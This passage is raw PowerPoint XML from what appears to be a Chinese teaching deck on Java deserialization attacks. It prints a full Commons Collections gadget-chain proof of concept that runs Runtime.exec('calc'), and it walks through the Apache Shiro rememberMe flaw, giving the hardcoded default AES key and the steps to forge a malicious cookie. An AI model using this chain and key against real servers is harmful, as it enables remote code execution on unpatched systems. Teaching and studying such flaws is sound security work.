              <a:t>版本的限制，只是限定了commons collections类库的版本要小于等于3.2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即可。</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123825" y="1174750"/>
            <a:ext cx="11563350" cy="5139690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完整</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        Transformer[] transformerArray=new Transformer[]{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            new ConstantTransformer(Runtime.class),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            new InvokerTransformer("getDeclaredMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        };</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        ChainedTransformer chainedTransformer = new ChainedTransformer(transformerArray);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        Map&lt;Object, Object&gt; map = new HashMap&lt;Object, Object&gt;();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        Map&lt;Object, Object&gt; lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"any1");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        HashMap&lt;Object, Object&gt; hashMap = new HashMap&lt;Object, Object&gt;();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        hashMap.put(tiedMapEntry,"any2");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        Class&lt;LazyMap&gt; lazyMapClass = LazyMap.class;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        Field factory = lazyMapClass.getDeclaredField("factory");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        factory.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        factory.set(lazyMap,chainedTransformer);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        lazyMap.remove("any1");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>序列化：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>PayLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>.bin"));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        oos.writeObject(object);</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124460" y="1195070"/>
            <a:ext cx="11885295" cy="5303520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据前面的介绍在具体说一下该漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原理：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在Shiro中，当我们勾选remember me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>记住我</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时会将我们的身份信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用AES加密后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化后存储在名为remember-me的Cookie中，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是对称加密，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Shiro&lt;=1.2.4里在源码中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>硬编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了一个默认密钥，因此当我们知道密钥后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者可以使用Shiro的默认密钥伪造用户Cookie，当我们下次请求时服务器会读取Cookie并对解密后的结果进行反序列化。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本：Apache Shiro &lt; 1.2.4，在1.2.4之后，ASE秘钥就不为默认了，需要获取到Key才可以进行渗透。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断：shiro反序列化的特征：在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537210" y="4021455"/>
            <a:ext cx="3181350" cy="2292985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3950970" y="3526155"/>
            <a:ext cx="3360420" cy="2710815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7475855" y="5010150"/>
            <a:ext cx="3872865" cy="897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154305" y="1233170"/>
            <a:ext cx="11662410" cy="5081905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征检测：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先利用工具对在登录页面选中记住我之后在点击登录的时候利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行抓包如下图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所示：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>返回包中有rememberMe=deleteMe，基本可以确定网站是Apache Shiro搭建。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733675" y="2451100"/>
            <a:ext cx="8519795" cy="4072255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="211455" y="3554730"/>
            <a:ext cx="2305050" cy="1571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115570" y="1185545"/>
            <a:ext cx="11701145" cy="989965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在登录界面如果勾选了rememberMe(记住我)并且在登录成功之后会调用AbstractRememberMeManager类中的onSuccessfulLogin()方法；如下图所示：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="2024-10-08-14-26-48-image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644015" y="2391410"/>
            <a:ext cx="7829550" cy="3267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241935" y="1243965"/>
            <a:ext cx="11335385" cy="1103630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先在图中可以看出在方法中主要有forgetIdentity()方法目的是要先清除之前的身份信息，然后在去判断是否勾选了rememberMe(记住我)那么如果勾选了则会执行rememberIdentity()方法，在跟踪该方法代码往下看：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="2024-10-08-14-30-01-image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="443865" y="1978025"/>
            <a:ext cx="8124825" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415925" y="3103880"/>
            <a:ext cx="10944860" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在该方法中又调用了rememberIdentity()方法：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="2024-10-08-14-31-34-image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="443865" y="3693160"/>
            <a:ext cx="8620125" cy="933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163830" y="1301115"/>
            <a:ext cx="10809605" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在这个方法中主要有两个方法，convertPrincipalsToBytes()方法主要是为了序列化：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="2024-10-08-14-35-24-image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374015" y="1888490"/>
            <a:ext cx="4733290" cy="2359660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="2024-10-08-14-35-55-image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555615" y="1804670"/>
            <a:ext cx="5766435" cy="2233930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="2024-10-08-14-36-38-image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723640" y="4173855"/>
            <a:ext cx="3689350" cy="2274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377190" y="1243330"/>
            <a:ext cx="4545965" cy="5071110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过序列化的代码发现其实在序列化过程中是对序列化内容进行了一个AES对称加密并且密钥是以硬编码的方式写在类中根据阅读源码发现其密钥为：kPH+bIxk5D2deZiIxcaaaA==</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而重点是要看rememberSerializedIdentity()方法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在rememberSerializedIdentity()方法中对AES加密的数据在进行base64编码，然后在放到Cookie中返回。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="2024-10-08-14-33-30-image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4994275" y="1541145"/>
            <a:ext cx="6894195" cy="4201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299720" y="1349375"/>
            <a:ext cx="11399520" cy="1986280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过阅读源码可以将加密过程总结如下：序列化--&gt;AES加密-(固定密钥)-&gt;base64编码--&gt;发送cookie；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那么我们就可以根据上述过程将自己的PayLoads进行RCE。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那么如何实现呢？其实可以先利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链来做一个测试；然后在编写恶意脚本进行攻击这里只展示弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算器；</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203200" y="1214755"/>
            <a:ext cx="3009900" cy="5038725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何实现对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链进行打入整合呢？首先利用前面编写的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链代码生成反序列化文件，在代码中要指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSLOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>平台，然后在通过代码的方式将其进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加密以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链生成序列化文件部分已经讲完了，那么如何实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加密以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码呢？可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现，源码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324225" y="1214755"/>
            <a:ext cx="8442960" cy="5546090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from email.mime import base</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from pydoc import plain</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>import sys</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>import base64</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from turtle import mode</a:t>
            </a:r>
